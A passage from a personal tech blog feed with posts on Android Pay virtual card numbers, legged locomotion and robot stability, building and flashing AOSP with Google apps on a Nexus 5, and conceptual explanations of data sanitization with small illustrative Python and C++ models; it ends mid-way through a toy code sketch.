<p>Handling the virtual number in this manner benefits both parties. First, it decreases the bank's risk: if Google doesn't handle the translation, then Google never has to send the real number over the wire to the next party in the processing chain. It benefits Google as well, because no translation on its end means no new infrastructure to build. Google can piggyback on the existing card processing infrastructure.</p>
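<p>Here is a toy Python model of that speculated flow, assuming (purely for illustration) that the bank is the party doing the translation. The list of parties follows the traditional card example earlier in this post; the route function and the dictionary standing in for a lookup table are hypothetical. It shows the property I'm arguing for: every hop before the translating party, including the phone, only ever handles the virtual number.</p>

```python
from typing import Dict, List, Tuple

# Parties in the processing chain, in order, following the traditional card
# example. Which party translates is the open question; below we assume the bank.
CHAIN: List[str] = [
    "phone (Android Pay)",
    "point-of-sale terminal",
    "terminal back end",
    "card processor",
    "bank",
]


def route(virtual_number: str, translator: str,
          lookup: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (party, number that party sees) for each hop in the chain.

    The number is swapped for the real one only when it reaches `translator`,
    the hypothetical party holding the virtual-to-real lookup table.
    """
    hops = []
    number = virtual_number
    for party in CHAIN:
        if party == translator:
            number = lookup[virtual_number]
        hops.append((party, number))
    return hops


hops = route("9999000011112222", translator="bank",
             lookup={"9999000011112222": "4111111111111111"})
for party, number in hops:
    print(f"{party:>24}: {number}")
```

<p>Passing translator="card processor" models the other candidate. Either way, nothing upstream of the translator ever sees the real number, which is why neither Google nor the retailer would need new infrastructure for it.</p>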
<h2>Unanswered Questions</h2>
<p>So who does the translation? If it isn't the retailer and it isn't Google, that leaves the bank and the card processor. Sadly, I don't have an answer to this question.</p>
<p>The other question I don't have an answer for is what is actually given to the retailer via NFC at the time of use. Is it simply the virtual number or is it something else?</p>
<p>These questions I leave to the reverse engineers.</p>How Number of Limbs Relates to Robots and Organisms2015-10-30T22:30:00-04:002015-10-30T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-30:/locomotion.html<p>This weekend, DARPA hosted its large robotics challenge, in which semi-autonomous robots had to perform a series of tasks simulating a disaster relief scenario. Specifically, robots had to be able to open doors, shut off water valves, drill holes in walls, climb stairs, and more. It was quite the spectacle to watch, and while it was impressive to see how far robotics has come, it also served as a reminder of how far robotics still has to go. The robots were very slow at performing their tasks, and there was plenty of falling over and unintended failure. Half the robots I observed couldn't even complete the first task of opening a normal door. In short, we can all rest easy knowing that these robots aren't going to be stealing our jobs or planning a violent uprising any time soon.</p>
<p>One other thing the average observer may have noticed is that the four-legged robots performed significantly better than the two-legged humanoid robots. To many, the reasons may seem obvious, but not to everyone. And even those who easily made sense of this outcome probably have not realized how these results are consistent with the biological organisms that inhabit our planet. With that in mind, I'd like to take a moment to write about locomotion and how it relates to robots and biological organisms alike.</p>
<h2>Locomotion in Biology</h2>
<p>Take a moment to recall every organism you can that moves over land using limbs. Now think about how many limbs each of these organisms primarily uses for moving. Now think about the number of limbs again, but this time pay special attention to the size of each organism relative to its number of limbs. Do this long enough, and a pattern should start to emerge: smaller organisms like bugs tend to have six or more limbs, while larger organisms like most mammals have four, and humans have only two. Once again, we're only considering the limbs used primarily for moving.</p>
<p>Is there something special about two limbs versus four limbs versus six limbs with regard to locomotion? As it turns out, there is. An organism's ability to remain stable, whether moving or stationary, changes with its number of limbs.</p>
<h2>Physics of Stability</h2>
<p>But first, a bit of physics review. What does it mean for an organism standing on limbs to be stable or unstable? First, consider the limbs that are in contact with the ground. Now connect these points of contact with imaginary lines to form a polygon on the ground beneath the organism. For the organism to be stable, its center of gravity must lie directly above some point within this polygon. If the center of gravity moves outside this area, the organism will start to tip, and without corrective action, it will eventually topple over. So how does this relate back to having two, four, or six limbs?</p>
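<p>The stability rule above translates directly into a small geometry check. Below is a minimal Python sketch, assuming flat ground and treating each contact as a single point in a 2D ground plane; the function names are my own. It builds the support polygon as the convex hull of the contact points (Andrew's monotone chain algorithm) and tests whether the ground projection of the center of gravity lies strictly inside it. A point exactly on an edge counts as unstable here, since the organism would be on the verge of tipping.</p>

```python
from typing import List, Tuple

Point = Tuple[float, float]


def cross(o: Point, a: Point, b: Point) -> float:
    """Z component of (a - o) x (b - o); positive when o -> a -> b turns left."""
    return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])


def support_polygon(contacts: List[Point]) -> List[Point]:
    """Convex hull of the ground contact points, counter-clockwise."""
    pts = sorted(set(contacts))
    if len(pts) <= 2:
        return pts
    lower: List[Point] = []
    for p in pts:
        while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:
            lower.pop()
        lower.append(p)
    upper: List[Point] = []
    for p in reversed(pts):
        while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:
            upper.pop()
        upper.append(p)
    # The last point of each chain is the first point of the other.
    return lower[:-1] + upper[:-1]


def is_statically_stable(contacts: List[Point], cog: Point) -> bool:
    """True if the center of gravity's ground projection is strictly inside the polygon."""
    hull = support_polygon(contacts)
    if len(hull) < 3:
        # One or two contact points form a point or a line, which has no interior.
        return False
    n = len(hull)
    # For a counter-clockwise hull, "inside" means left of every edge.
    return all(cross(hull[i], hull[(i + 1) % n], cog) > 0 for i in range(n))


square = [(0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0)]  # four feet
print(is_statically_stable(square, (0.5, 0.5)))  # True: COG over the middle
print(is_statically_stable(square, (1.5, 0.5)))  # False: COG outside the polygon
print(is_statically_stable([(0.0, 0.0), (1.0, 0.0)], (0.5, 0.0)))  # False: only a line
```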
<h2>Six-Limbed Organisms</h2>
<p>First, consider the six-limbed bug. When the bug is stationary, it is standing on all six limbs and is stable. What about when it wants to move? To move, the bug can pick up, for example, its front right, back right, and middle left limbs. This leaves its front left, back left, and middle right limbs on the ground, forming a tripod. As long as the bug keeps its center of gravity near the center of its body, this is a stable position, so the bug is free to move its lifted limbs forward and place them down. Placing them down creates another tripod, which in turn stabilizes the bug so it can lift and move the limbs that were previously grounded. By using this "alternating tripod" locomotion, the bug can move while always being stable. In other words, if I had a magic wand that could freeze the bug at any point during its locomotion, it would not fall over. To summarize, with six limbs an organism can be stable while stationary or in motion.</p>
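<p>As a sanity check on the alternating tripod argument, here is a small Python sketch. The foot coordinates are invented for illustration (x points right, y points forward, and the bug's center of gravity projects onto the origin), and it assumes each step returns the feet to the same positions relative to the body. For each phase of the gait, it checks that the center of gravity lies inside the triangle formed by whichever tripod is on the ground.</p>

```python
from typing import Dict, List, Tuple

Point = Tuple[float, float]

# Hypothetical foot positions: x to the right, y forward, COG at the origin.
FEET: Dict[str, Point] = {
    "front_left": (-1.0, 2.0), "front_right": (1.0, 2.0),
    "middle_left": (-1.2, 0.0), "middle_right": (1.2, 0.0),
    "back_left": (-1.0, -2.0), "back_right": (1.0, -2.0),
}

# The two tripods from the text: while one is lifted, the other stays grounded.
TRIPOD_A: List[str] = ["front_left", "back_left", "middle_right"]
TRIPOD_B: List[str] = ["front_right", "back_right", "middle_left"]


def _side(p: Point, a: Point, b: Point) -> float:
    """Signed area test: which side of the line a -> b the point p is on."""
    return (b[0] - a[0]) * (p[1] - a[1]) - (b[1] - a[1]) * (p[0] - a[0])


def in_triangle(p: Point, a: Point, b: Point, c: Point) -> bool:
    """True if p lies strictly inside triangle abc (either winding order)."""
    d1, d2, d3 = _side(p, a, b), _side(p, b, c), _side(p, c, a)
    return (d1 > 0 and d2 > 0 and d3 > 0) or (d1 < 0 and d2 < 0 and d3 < 0)


def tripod_gait_is_always_stable(cog: Point, steps: int = 4) -> bool:
    """Alternate which tripod is grounded and check the COG at every phase."""
    for step in range(steps):
        grounded = TRIPOD_A if step % 2 == 0 else TRIPOD_B
        a, b, c = (FEET[name] for name in grounded)
        if not in_triangle(cog, a, b, c):
            return False
    return True


print(tripod_gait_is_always_stable((0.0, 0.0)))  # True: both tripods contain the COG
print(tripod_gait_is_always_stable((1.5, 0.0)))  # False: COG pushed outside the stance
```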
<h2>Four-Limbed Organisms</h2>
<p>What about the four-limbed organism? When it's stationary, it has four limbs on the ground, so again there is no problem with stability. But what about when it moves? Now there's a problem. With only four limbs, it cannot use the alternating tripod motion described earlier. It can still remain stable while in motion, but the motion has to be very awkward. Specifically, the organism has to shift its center of gravity into the right triangle formed by three of its limbs, move the now-free limb forward, and then shift its center of gravity into the newly formed right triangle to free up another limb. This is possible, but now the organism is intentionally shifting its center of gravity as it moves, which is something the six-limbed organism didn't have to concern itself with. To summarize, the four-limbed organism is stable while stationary and potentially stable while moving, but it requires a more complicated locomotion.</p>
<h2>Two-Limbed Organisms</h2>
<p>Which leaves us with the two-limbed organism. This organism isn't very stable while standing or moving. The problem is that two limbs only form a line, not a polygon. So if each limb contacted the ground at only a single point, the organism would constantly be falling, no matter where it shifted its center of gravity. To compensate for this, two-limbed organisms have feet. Since the feet contact the ground over an area and not at a single point, the line becomes a very narrow rectangle, and stability can be achieved while standing. However, this rectangle is very narrow compared to the polygons formed by the stationary four- or six-limbed organism. Consequently, if someone were to push each organism, the two-limbed organism would be much easier to knock over than the others. To state it more precisely, the four- and six-limbed organisms have a wide margin of stability when stationary, while the two-limbed organism sits much closer to unstable equilibrium: when disturbed by an outside force, the four- and six-limbed organisms tend to remain standing, while the two-limbed organism tends to start falling over.</p>
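<p>One way to put numbers on "wide" versus "narrow" is the static stability margin: the shortest distance from the center of gravity's ground projection to an edge of the support polygon, positive inside and zero on an edge. The Python sketch below computes it for a few stances. All shapes share one arbitrary unit and are invented for illustration, not measured from real animals: a bug on one tripod, a four-limbed organism standing and with its front right limb lifted (before and after shifting its center of gravity), and a two-limbed organism standing on two feet.</p>

```python
import math
from typing import Dict, List, Tuple

Point = Tuple[float, float]


def stability_margin(polygon: List[Point], cog: Point) -> float:
    """Smallest signed distance from `cog` to the edges of a counter-clockwise
    convex support polygon: positive inside, zero on an edge, negative outside."""
    margins = []
    for i, a in enumerate(polygon):
        b = polygon[(i + 1) % len(polygon)]
        edge_x, edge_y = b[0] - a[0], b[1] - a[1]
        # Cross product over edge length = signed distance to the edge's line.
        cross = edge_x * (cog[1] - a[1]) - edge_y * (cog[0] - a[0])
        margins.append(cross / math.hypot(edge_x, edge_y))
    return min(margins)


# Hypothetical stances (x right, y forward); every polygon is counter-clockwise.
CASES: Dict[str, Tuple[List[Point], Point]] = {
    "six limbs, one tripod down": ([(-1.0, 2.0), (-1.0, -2.0), (1.2, 0.0)], (0.0, 0.0)),
    "four limbs, all down": ([(-1.0, -2.0), (1.0, -2.0), (1.0, 2.0), (-1.0, 2.0)], (0.0, 0.0)),
    "four limbs, front right lifted": ([(-1.0, -2.0), (1.0, -2.0), (-1.0, 2.0)], (0.0, 0.0)),
    "four limbs, lifted, COG shifted": ([(-1.0, -2.0), (1.0, -2.0), (-1.0, 2.0)], (-0.3, -0.3)),
    "two feet, side by side": ([(-0.15, -0.1), (0.15, -0.1), (0.15, 0.15), (-0.15, 0.15)], (0.0, 0.0)),
}

for name, (polygon, cog) in CASES.items():
    print(f"{name}: {stability_margin(polygon, cog):.2f}")
# six limbs, one tripod down: 0.81
# four limbs, all down: 1.00
# four limbs, front right lifted: 0.00
# four limbs, lifted, COG shifted: 0.40
# two feet, side by side: 0.10
```

<p>The lifted-limb case landing at exactly 0.00 is the awkwardness described for four-limbed organisms: with the center of gravity over the middle of the body, it sits right on the triangle's hypotenuse, so the organism must shift its weight before it can step safely.</p>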
<p>As with the four-limbed organism, it is possible for the two-limbed organism to move without sacrificing stability, but doing so results in a very awkward locomotion. The organism has to shift its center of gravity to balance on one foot so it can lift and move the other foot, and then it has to carefully shift its center of gravity toward the newly placed foot, making sure that it doesn't leave the narrow rectangle representing its stability. You can imagine how awkward and difficult this would be.</p>
<h2>Complexity Versus Efficiency</h2>
<p>So if having fewer than six limbs makes it difficult for an organism in motion to remain stable, why do any organisms have fewer than six limbs? As it turns out, being unstable isn't always a bad thing. If an organism is always stable, it has to do all the work of moving itself. On the other hand, if an organism is unstable, it can let gravity do some of that work for it.</p>
<p>Consider once again the two-limbed organism, specifically a human, since that's the two-limbed organism we're all most familiar with. Again, I'm only considering limbs used for locomotion. Our primary form of locomotion is walking, but if you think about it, walking is really nothing more than controlled falling. To walk forward, a person lifts a foot, shifts their center of gravity forward, and then catches themselves with the lifted foot as they fall. The forward momentum from that fall then allows the person to lift their other foot and catch themselves again as they fall forward. After the first step, part of the forward motion comes from momentum gained by falling under gravity, and that is energy the organism no longer needs to generate itself. The result is a much more efficient locomotion than if the organism had to generate all the energy itself.</p>
<p>The same notion applies to running for two- and four-limbed organisms. Once the organism is running, the energy needed to keep running is mostly the energy needed to lift itself a few inches off the ground and then to catch itself when gravity pulls it back down. During the part of its stride when all of its limbs are off the ground, it uses no energy to propel itself while still moving forward. To summarize, instability allows for greater efficiency.</p>
<h2>Conclusion</h2>
<p>The takeaway from all this is that when it comes to locomotion, the number of limbs a system has results in a trade-off between complexity and efficiency. With more limbs, the system can be simpler because it's more stable. With fewer limbs, the system can be more efficient, but it also becomes more complex, as it now has to be aware of its momentum and center of gravity. This could be one explanation for why simpler organisms like bugs tend to have many limbs while more complex organisms like mammals tend to have fewer.</p>
<p>So what does all this have to do with the DARPA Robotics Challenge? What I hope I demonstrated with this rant on locomotion is that it shouldn't come as a surprise that the four-limbed robots outperformed the two-limbed robots in this competition. For the engineers designing and building these robots, making a robot that can move on only two limbs adds a layer of complexity that four-limbed robots don't have to worry about. However, I believe that as the field of robotics advances, two-limbed robots will ultimately be superior to four-limbed robots on land, especially as efficiency becomes the leading concern.</p>Installing Google Play Service and Google Apps on Nexus AOSP2015-10-30T22:30:00-04:002015-10-30T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-30:/play-service-on-aosp.html<p>I figured out how to get Google Play Services and all the basic Google apps onto a custom-compiled AOSP image. It's kind of tricky, so I'll outline what I learned here. I specifically got it working on a Nexus 5 using a modified version of Android 5.0.2, but these steps will hopefully work for all Nexus devices and most Android versions. This tutorial is broken up into 4 parts:</p>
<h2>Part 1: Compiling a Custom Image</h2>
<p>First, make sure you've downloaded the vendor drivers for your device: <a href="https://developers.google.com/android/nexus/drivers">link</a></p>
<p>Once you've downloaded the appropriate files, unzip them. You should now have a set of script files. Place these scripts in the root directory of your AOSP repository and run each one, accepting the license agreement it displays.</p>
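<p>Next, make sure you've sourced the build environment and selected the correct lunch target for your device. For the Nexus 5 (hammerhead), this was option 20 in my tree; the numbering can differ between source trees, so double-check the menu that lunch prints when run without arguments:</p>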
<div class="highlight"><pre><span></span><code><span class="nb">source</span><span class="w"> </span>build/envsetup.sh
lunch<span class="w"> </span><span class="m">20</span>
</code></pre></div>
<p>If this is your first time doing a make with the vendor drivers, you need to clobber to make sure the drivers are compiled into the ROM:</p>
<div class="highlight"><pre><span></span><code>make<span class="w"> </span>clobber
</code></pre></div>
<p>After that, make your ROM:</p>
<div class="highlight"><pre><span></span><code>make
</code></pre></div>
<h2>Part 2: Flashing Custom Image to a Nexus Device</h2>
<p>First, reboot your device into fastboot. The hardware button sequence for your device can be found here: <a href="https://source.android.com/source/building-devices.html">link</a></p>
<p>Once in fastboot, ensure that your bootloader is unlocked. You can look up how to do this online.</p>
<p>After that, check that your computer can detect your device. You should see it when you run the following command:</p>
<div class="highlight"><pre><span></span><code>fastboot<span class="w"> </span>devices
</code></pre></div>
<p>If you can't see it, check your USB drivers and make sure you have Google's Nexus USB drivers if you're using a Nexus device.</p>
<p>Finally, flash the device:</p>
<div class="highlight"><pre><span></span><code>fastboot<span class="w"> </span>-w<span class="w"> </span>flashall
</code></pre></div>
<h2>Part 3: Flashing Recovery</h2>
<p>At this point, you've compiled a custom image and flashed it to your device. The next goal is to install the standard Google apps (Google Play Services, the Play Store, Gmail, etc.). Unfortunately, the default recovery doesn't work well with rooted devices, so before we can do that, we need to install a third-party recovery.</p>
<p>First, reboot the device into fastboot. This can be done via adb:</p>
<div class="highlight"><pre><span></span><code>adb<span class="w"> </span>reboot<span class="w"> </span>bootloader
</code></pre></div>
<p>Once in fastboot, we can flash the recovery partition with our custom recovery. I recommend TWRP, which can be found here: <a href="https://twrp.me/Devices/">link</a></p>
<p>For the Nexus 5, this version of TWRP will work: <a href="https://dl.twrp.me/hammerhead/twrp-2.8.7.1-hammerhead.img.html">link</a></p>
<div class="highlight"><pre><span></span><code>fastboot<span class="w"> </span>flash<span class="w"> </span>recovery<span class="w"> </span>twrp-2.8.7.1-hammerhead.img
</code></pre></div>
<p>After that, reboot the device:</p>
<div class="highlight"><pre><span></span><code>fastboot<span class="w"> </span>reboot
</code></pre></div>
<h2>Part 4: Install Gapps</h2>
<p>First, download a gapps archive. One source is the CyanogenMod wiki: <a href="https://web.archive.org/web/20161224215109/https://wiki.cyanogenmod.org/w/Google_Apps">link</a></p>
<p>The wiki only shows which gapps package corresponds to which CyanogenMod version, not the equivalent AOSP version. From my experience, I believe the following mapping holds:</p>
<ul>
<li>Android 5.1.0 <=> CM 12.1</li>
<li>Android 5.0.0, 5.0.1, 5.0.2 <=> CM 12</li>
</ul>
<p>If you are using a different version of AOSP, you'll have to experiment and find the right version on your own. Note that you can always do a factory reset from recovery to remove gapps and then install another version.</p>
<p>Once you've downloaded a version of gapps, push it to the SD card:</p>
<div class="highlight"><pre><span></span><code>adb<span class="w"> </span>push<span class="w"> </span>gapps.zip<span class="w"> </span>/sdcard/
</code></pre></div>
<p>Once the zip is written to the SD card, reboot into recovery:</p>
<div class="highlight"><pre><span></span><code>adb<span class="w"> </span>reboot<span class="w"> </span>recovery
</code></pre></div>
<p>Once in recovery, select install from zip and choose your zip. After the installation is complete, select the wipe button at the bottom of the screen and then reboot the device. If everything worked correctly, you should be greeted by the Welcome screen, which will ask you to configure your device. If you do not get the Welcome screen, then you either didn't install the correct version of gapps or you forgot to wipe something.</p>Digital Versus Analog Sanitization2015-10-28T22:30:00-04:002015-10-28T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-28:/water-buckets.html<p>As I promised in my <a href="https://carteryagemann.com/data-sanitization.html">previous blog post</a>, I will try to explain the difference between digital and analog sanitization using an analogy better suited to the task. If you have no clue what I'm talking about, I recommend that you go and read that <a href="https://carteryagemann.com/data-sanitization.html">post</a>. If you were hoping for the other follow-up I promised, a more practical guide to data protection, this is not that post. This is going to be another conceptual piece.</p>
<h2>The Analogy</h2>
<p>The analogy I'm going to use to illustrate the difference between digital and analog sanitization might seem somewhat contrived, but it's the simplest one I could come up with, so here goes.</p>
<p>Imagine you have a collection of buckets that can each hold 4 cups of water. You can add and remove water from the buckets whenever you like; however, you must always try to add or remove 3 cups of water at a time. So if a bucket is empty and you add water to it, the bucket ends up with 3 cups of water in it. If you try to add water again to the same bucket, some water overflows and is lost, so the bucket ends up with 4 cups of water in it. Similarly, if the bucket only has 1 cup of water in it and you try to remove water, you end up removing all the remaining water in the bucket.</p>
<p>Now here's the last piece of the analogy. Assume that we only care about whether a particular bucket is more full or more empty. If a bucket contains more than 2 cups of water, we will call it mostly full; if it has less than 2 cups of water, we will call it mostly empty. We don't have to worry about any bucket having exactly 2 cups of water in it, given how this model works. In fact, assuming all the buckets start empty, a bucket can only ever contain 0, 1, 3, or 4 cups of water.</p>
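<p>If it helps to see the rules spelled out, here is a minimal Python model of a single bucket. The constant and function names are my own; the numbers (4-cup buckets, 3-cup pours, a 2-cup threshold) come straight from the analogy. Exploring every sequence of adds and removes starting from an empty bucket confirms that only 0, 1, 3, and 4 cups are reachable.</p>

```python
from typing import List, Set

CAPACITY = 4  # cups a bucket can hold
POUR = 3      # cups you always try to add or remove at once


def add_water(level: int) -> int:
    """Try to add 3 cups; anything beyond capacity overflows and is lost."""
    return min(level + POUR, CAPACITY)


def remove_water(level: int) -> int:
    """Try to remove 3 cups; you cannot remove more than the bucket holds."""
    return max(level - POUR, 0)


def digital_state(level: int) -> str:
    """Read the bucket the way our model does: mostly full or mostly empty."""
    return "full" if level > CAPACITY / 2 else "empty"


def reachable_levels() -> Set[int]:
    """Explore every level reachable from an empty bucket (depth-first search)."""
    seen = {0}
    frontier: List[int] = [0]
    while frontier:
        level = frontier.pop()
        for nxt in (add_water(level), remove_water(level)):
            if nxt not in seen:
                seen.add(nxt)
                frontier.append(nxt)
    return seen


levels = sorted(reachable_levels())
print(levels)                                   # [0, 1, 3, 4]
print([digital_state(level) for level in levels])  # ['empty', 'empty', 'full', 'full']
```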
<h2>Emptying the Buckets</h2>
<p>So we have our buckets, some time has gone by, and now our buckets contain different amounts of water. Some are mostly full while others are mostly empty. Now let's assume that we want to "wipe" all of our buckets. In other words, we want all of our buckets to be mostly empty. The process is easy: we just go to every bucket and remove water from it. Simple, right?</p>
<p>While it is true that doing this will leave all of our buckets mostly empty, take another look at how much water is actually in each bucket. The buckets that originally had 3 or fewer cups of water will now be empty, but the buckets that originally had 4 cups of water will still have 1 cup remaining. This means that if we inspect how much water is in each bucket, we can determine which ones previously held 4 cups of water. We can reconstruct a portion of the past state of the buckets from their current state!</p>
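<p>Here is that single-pass wipe as a short Python sketch (again, the names are mine and the numbers come from the analogy). Every bucket reads as mostly empty afterwards, yet the leftover water still points straight at the buckets that were full to the brim.</p>

```python
from typing import List

POUR = 3  # cups removed per attempt, as in the analogy


def remove_water(level: int) -> int:
    """Try to remove 3 cups; a bucket can't go below empty."""
    return max(level - POUR, 0)


def reads_full(level: int) -> bool:
    """Digital reading: more than 2 cups counts as mostly full."""
    return level > 2


def wipe_once(levels: List[int]) -> List[int]:
    """'Wipe' every bucket by removing water from it a single time."""
    return [remove_water(level) for level in levels]


before = [0, 1, 3, 4, 4, 3, 1, 0]
after = wipe_once(before)
print(any(reads_full(level) for level in after))  # False: every bucket reads mostly empty
print(after)                                      # [0, 0, 0, 1, 1, 0, 0, 0]
# The leftover cup reveals exactly which buckets used to hold 4 cups.
recovered = [i for i, level in enumerate(after) if level > 0]
print(recovered)                                  # [3, 4]
```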
<h2>What Went Wrong?</h2>
<p>In a nutshell, we were able to figure out the past state of some of the buckets because there is a correlation between the last state a bucket was in and its current state. This correlation occurred because when we emptied the buckets, we only considered the 2 possible digital states of a bucket and ignored the 4 possible analog states. Had we considered the analog states, we would have realized that we needed to empty each bucket twice to make it impossible to determine any bucket's previous state. This, in miniature, is the difference between digital and analog sanitization.</p>
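<p>The fix generalizes: a completely full bucket needs enough removals to drain all of it, so within this toy model the number of passes is the capacity divided by the pour size, rounded up. The Python sketch below (function names are mine) checks that one pass leaves a trace among the reachable levels while two passes do not.</p>

```python
import math
from typing import Iterable


def passes_needed(capacity: int, pour: int) -> int:
    """Fewest removals guaranteed to drain even a completely full bucket."""
    return math.ceil(capacity / pour)


def leaves_trace(levels: Iterable[int], passes: int, pour: int) -> bool:
    """True if any bucket still holds water after `passes` removals.

    Removing `pour` cups `passes` times (never going below zero) is the same as
    removing passes * pour cups at once and clamping at zero.
    """
    return any(max(level - passes * pour, 0) > 0 for level in levels)


reachable = [0, 1, 3, 4]  # the only levels possible in the analogy
print(passes_needed(capacity=4, pour=3))          # 2
print(leaves_trace(reachable, passes=1, pour=3))  # True: the 4-cup buckets keep 1 cup
print(leaves_trace(reachable, passes=2, pour=3))  # False: every bucket is truly empty
```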
<h2>Back to Reality</h2>
<p>Although our simple analogy used buckets of water, this concept actually applies to electronic storage devices. Those of us with experience in the logical side of computing, such as any computer scientist who might happen to read this, have a tendency to abstract away the gritty details of how the underlying hardware of a computer works. While this layer of abstraction simplifies our problems and makes them approachable, abstractions such as these can cause us to forget that our idealistic binary zeros and ones are actually being stored in physical materials. As every electrical engineer knows, these physical materials don't behave in accordance with our perfectly abstracted models. Instead, we have to take their infinite possible analog states and group them into the "zero" set and the "one" set in order to fit them to our models. Never forget, however, that at the end of the day the storage device is indeed physical and consequently analog. Correlations between states can exist but become hidden underneath the veil of our abstractions.</p>
<p>So to end on a slightly more practical note, how do professionals deal with these analog correlations? What is the takeaway from all this? The short answer is that if you want to wipe an electronic storage device, but you can't simply destroy it, don't settle for "zeroing" out the data in a single pass. Overwrite all the data with random values and do so multiple times. The more passes and the more entropy, the less likely it is that a correlation will remain between the original data and the current state of the device. How many passes are necessary depends on the particulars of the device, so if you need to wipe a computer, smartphone, or other electronic device, I recommend doing some research and selecting a professional tool to do the work for you. DBAN, for example, is a good one to consider.</p>Is your data really gone? Explaining the challenges of data wiping.2015-10-24T22:30:00-04:002015-10-24T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-24:/data-sanitization.html<p>Every now and again you hear on the news about some police investigation having a breakthrough by recovering deleted data from an electronic device belonging to a possible suspect. You may also hear about professional criminals who recover sensitive information, such as credit card numbers, by sifting through the hard drives of old discarded computers.</p>
<p>How does this happen? How is it that data turns out to still be on the device even when the user consciously takes actions to delete it?</p>
<p>In this article, I'm going to cover a conceptual topic which forms one of the cornerstones of a field known as <em>digital forensics</em>. Namely, what does it mean for data on an electronic device to be deleted and what does it take to restore this supposedly destroyed information?</p>
<h2>Terminology</h2>
<p>The first step to grasping what it means for data to be deleted is to understand that "deletion" can have multiple technical meanings which vary from the definition we use in everyday speech. Basically, data on an electronic device can be deleted to different extents, and the extent to which we delete the data determines how difficult it will be to recover.</p>
<p>Many publications already categorize the degrees of data sanitization. For example, <a href="http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-88r1.pdf">NIST 800-88</a> (see Table 5.1) offers very generalized definitions of what the degrees of data sanitization are. However, since I want this article to be approachable to laypeople, I'm going to use an alternative categorization used in many <a href="https://www.usenix.org/legacy/event/fast11/tech/full_papers/Wei.pdf">publications</a>. If you're curious about how these two categorizations relate, the categorization I'm going to be using in this article fits into the <em>Clear</em> and <em>Purge</em> categories of NIST 800-88. Namely, I'm going to cover <em>logical sanitization</em>, <em>cryptographical sanitization</em>, <em>digital sanitization</em>, and <em>analog sanitization</em>.</p>
<h2>Logical Sanitization</h2>
<p>Logical sanitization is the weakest form of sanitization and the easiest to explain, so I'll cover it first using an analogy:</p>
<p>Imagine a particular file on your electronic device as being a house. In order to visit the house, you have to know how to get there. Luckily, the streets have signs at every intersection. By following the signs, you're able to find the house.</p>
<p>Now imagine that I take down all the signs. The house still exists, but now if you want to visit it, you'll have to search every street. This is what it means to logically sanitize data.</p>
<p>You can probably already see the shortcoming of this form of sanitization. Just because I take down the signs pointing to a piece of data doesn't mean that someone can't still find that data with enough effort.</p>
<p>Despite this fault, this is what actually happens on your electronic device when you delete a file normally. Your device doesn't actually delete the file itself; it just deletes its pointers to that file. This means that until a new file is written into the space the old file occupied, the old file can still be recovered. And since storage these days is large and most systems write new data randomly across the storage, that old file can remain there for a very long time.</p>
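<p>The street-sign analogy can be modeled with a toy C++ "disk", purely as an illustration: <code>ToyDisk</code> and its methods are hypothetical names, and real file systems are far more involved. The directory plays the role of the street signs, deleting a file only erases its directory entry, and a brute-force search of every block (similar in spirit to what forensic tools call file carving) still finds the contents.</p>

```cpp
#include <cstddef>
#include <map>
#include <string>
#include <vector>

// Hypothetical toy "disk": raw blocks (the houses) plus a directory that maps
// file names to block numbers (the street signs). This only models the idea
// of logical deletion, not any real file system.
struct ToyDisk {
    std::vector<std::string> blocks;
    std::map<std::string, std::size_t> directory;

    void write(const std::string& name, const std::string& data) {
        directory[name] = blocks.size();
        blocks.push_back(data);
    }

    // Logical sanitization: remove the pointer, leave the data block untouched.
    void logicalDelete(const std::string& name) { directory.erase(name); }

    bool exists(const std::string& name) const {
        return directory.count(name) > 0;
    }

    // Recovery without any signs: search every block ("every street") for a
    // known pattern, such as text that looks like a credit card number.
    std::vector<std::string> carve(const std::string& pattern) const {
        std::vector<std::string> hits;
        for (const std::string& block : blocks) {
            if (block.find(pattern) != std::string::npos) {
                hits.push_back(block);
            }
        }
        return hits;
    }
};
```

<p>After <code>logicalDelete("notes.txt")</code>, <code>exists("notes.txt")</code> returns false, but <code>carve</code> still returns the file's contents, because nothing ever overwrote the block.</p>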
<p>So why do electronic devices delete data this way? Frankly, because it's the fastest method. Most users are more concerned with speed than with security, so system developers design their systems to delete data in the fastest way possible.</p>
<h2>Cryptographical Sanitization</h2>
<p>Cryptographical sanitization is an alternative version of logical sanitization which offers a bit more protection against data recovery.</p>
<p>To explain the difference, consider the house analogy again, only this time, the house also has a gated wall surrounding it. Luckily, you have a piece of paper in your hand which contains the password to open the gate. Thanks to this paper, you're able to visit the house without problem.</p>
<p>Now if I want to prevent you from visiting the house, I don't need to take down all the street signs, I just need to destroy your piece of paper which contains the password to the gate. Destroying this piece of paper is analogous to cryptographical sanitization.</p>
<p>However, this too has its shortcomings. For example, what if you memorized the password or otherwise made a copy of the paper? Alternatively, what if the password is so short that you could simply guess it? These are two serious challenges for cryptographical sanitization.</p>
<p>Additionally, cryptographical sanitization is weakened by the fact that it is circular. For example, what if I destroyed the paper containing the password by logically sanitizing it? You could just recover the paper, as mentioned in the previous section, and then access the house. In other words, cryptographical sanitization is only as strong as the sanitization applied to the password. If we apply cryptographical sanitization to that as well, then as the philosophers would say, it's turtles all the way down.</p>
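<p>The gate-and-password idea can be sketched in C++ as well, under loud assumptions: the "cipher" below is a XOR with a <code>std::mt19937</code> keystream seeded by a 32-bit key, which is not real encryption and only stands in for a proper cipher such as AES so the example needs no crypto library. The names <code>xorWithKeystream</code> and <code>ToyEncryptedDisk</code> are hypothetical. Erasing only the key makes the stored data unreadable through normal means, yet anyone who kept a copy of the key can still decrypt the leftover ciphertext. A 32-bit key is also small enough to try every possibility, which mirrors the short-password problem above.</p>

```cpp
#include <cstdint>
#include <optional>
#include <random>
#include <string>

// TOY ONLY: XOR with a std::mt19937 keystream is not real encryption. It
// stands in for a real cipher (e.g., AES) so no crypto library is needed.
std::string xorWithKeystream(const std::string& data, std::uint32_t key) {
    std::mt19937 keystream(key);  // same key -> same keystream
    std::string out = data;
    for (char& c : out) {
        auto byte = static_cast<unsigned char>(c);
        auto pad = static_cast<unsigned char>(keystream());  // low 8 bits
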